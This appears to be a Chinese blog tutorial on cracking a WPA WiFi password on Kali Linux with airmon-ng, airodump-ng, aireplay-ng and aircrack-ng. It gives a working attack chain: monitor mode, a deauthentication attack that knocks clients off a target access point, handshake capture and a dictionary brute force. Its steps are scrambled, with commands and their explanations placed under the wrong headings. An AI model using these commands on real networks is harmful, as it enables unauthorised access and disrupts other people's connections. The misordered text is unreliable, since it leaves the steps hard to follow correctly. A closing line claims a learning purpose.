ifconfig 查看网卡名
实验环境:VMware Workstation Pro虚拟机,Kali Linux 2021.2操作系统,支持监听的无线网卡。请确保已准备好这些环境,我们直接进入主题。
一、查看信息
ifconfig wlan0 up 激活网卡
airmon-ng check kill 结束干扰进程
airmon-ng start wlan0 开启网卡监听模式
airodump-ng wlan0 开始监听
二、激活网卡
执行完命令后,如果没有提示,说明我们的网卡已成功激活!
三、结束干扰进程
执行完命令后,如果没有显示任何内容,继续下一步。如果有内容显示,也继续下一步。
四、开启网卡监听模式
注意:有些网卡可能与我的不同,可能是wlan0mon。接下来,我们都将使用显示的网卡名称来执行命令。
五、开始监听
airodump-ng -w yyy -c 11 --bssid C8:5B:A0:AF:FD:C2 wlan0
开启监听后,它会自动扫描附近的WiFi。当看到自己想要破解的WiFi后,按下Ctrl+C停止扫描,然后继续下一步。
参数介绍:
- BSSID:表示无线AP的MAC地址
- PWR:网卡报告的信号强度
- CH:信道号
- MB:无线AP所支持的最大速率
- ESSID:局域网名称
- STATION:客户端的MAC地址,包括已连接和想要连接的客户端
- Rate:表示传输速率
六、抓取握手包
aireplay-ng -0 5 -a C8:5B:A0:AF:FD:C2 -c 22:21:29:AA:4F:84 wlan0
yyy表示创建的握手包名,可以随意命名。
11表示频道CH。
C8:5B:A0:AF:FD:C2表示BSSID,请根据扫描显示的信息填写。
当出现我指示的字符时,表示我们成功地抓到了握手包。如果没有抓到握手包,不要紧,请继续下一步。
七、强制断开连接的设备,让其重新连接
当设备重新连接时,我们就可以抓到包了。请记得在新窗口中执行命令,不要关闭原来的窗口。注意观察,是否出现我指示的字符。如果出现了,说明我们已经成功抓到包,接下来进行最后一步。
aircrack-ng -w /root/文档/hacker.txt -b C8:5B:A0:AF:FD:C2 /root/yyy-01.cap
5表示攻击次数,-a表示BSSID,-c表示连接的设备。
这次,我们也成功地抓到了包。接下来是最后一步。
八、使用密码字典对WiFi密码握手包进行暴力破解
请确保填写正确的绝对路径。
-w表示字典文件的绝对路径。
-b表示BSSID。
/root/yyy-01.cap表示握手包的绝对路径。
如果成功破解,结果将显示在下方图表中。
本文章仅用于学习目的,请在自己搭建好环境后,不要破解邻居的WiFi或公共场所的WiFi。希望大家通过本文章了解WiFi破解原理,提高网络攻防知识。最后感谢您的阅读,我会继续努力撰写更多与Kali Linux相关的知识!
“`